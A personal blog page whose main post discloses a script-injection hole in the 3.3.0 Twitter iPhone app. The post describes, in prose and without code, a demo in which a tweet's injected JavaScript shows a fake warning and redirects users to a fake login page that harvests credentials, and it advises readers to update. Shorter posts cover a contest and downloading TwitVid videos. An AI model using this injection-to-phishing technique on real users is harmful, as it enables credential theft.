If you havn’t updated the official Twitter iPhone app on your iPhone/iPod recently, you may want to do so as I’ve found something in the app version (3.3.0) previous to the current one (3.3.1). If you’ve updated to the latest version since the 9th or so, you’re fine. This affects only the official Twitter app for iPhone/iPod, not Twitterrific or others.

I found a security hole in the 3.3.0 Twitter iPhone app! You can inject your own HTML, CSS and JavaScript into the iPhone client, this hack leaves users wide open to phishing scams and the sort.

I haven’t tested the full possibilities of this but I imagine there are loads here! The hack I’m demoing adds JavaScript remotely (in this case ‘tweet.js’) to the view, it executes, spoofs a warning pop up, tapping either ‘Ok’ or ‘Cancel’ brings you to a new page regardless, this page can be anything, in this case I’ve set it to look like a Twitter login page, which upon entering a users details, could, via a form, be emailed back to someone.

Heres the screenshots and a walkthrough:

1. Tweet containing the JavaScript to inject (the ‘<script>‘ bit)

2.Intial view with scrolling warning text

3.’Warning’ pop up, (appears after 3.5 secs), pressing either button sends you to our phishing site, no way out (*wimper*)

4.Fake Twitter account protect page

5.Upon press of ‘Protect Account’ button, sends you to my site (or any site with nastier stuff or could email entered details)

What you do?

UPDATE your Twitter app via the AppStore, should you be unable to do so, stay the hell away from any tweets that contain any tags like ‘<html>‘ or ‘<script>‘, you’ll notice the weird link. You can see if a tweet contains this from your main timeline view in the app.

So ExploreYourIE ran a pretty bitchin’ comp over twitter that whoever tweeted the best 30 characters would win one of these bad boys….

Cork or ‘Cark’ (depending where yer from) based company HairyBaby made these.

Right, so in my previous post I embedded the vid of my first backflip via twitvid.com, however what would I do if I wanted to download that? Heres a guide on how to download vids from twitvid!

1.

Goto the page of the video you wanna download, see the URL bit up top, well in this case its ” http://www.twitvid.com/A7C51 “, well just ” player/” after the “twitvid.com”, so it’d be “http://www.twitvid.com/player/A7C51″, hit enter an go it.

2.

righto, so you’ll be brought to this page, its basically a big screen flash player of the vid, the url will now be something ridonkcolously, pick out the http://www.twitvid.com/playVideo_A7C51/token_87c55b1e07b6647e6e7bf172b6585ef0

copy and paste it into the url bar and go to it!

3.

Right, so this is the movie file playing in your browser, its a .mp4 (MPEG4) file, so you can right click the page and save as, or goto the ‘edit’ tab and save page as, or what ever!

Now you can download and do whatever the hell you want!

Whoa Whoa Whoa, if you found this useful, give something back, follow me on Twitter for more awesomeness

Well at least she got 10 points…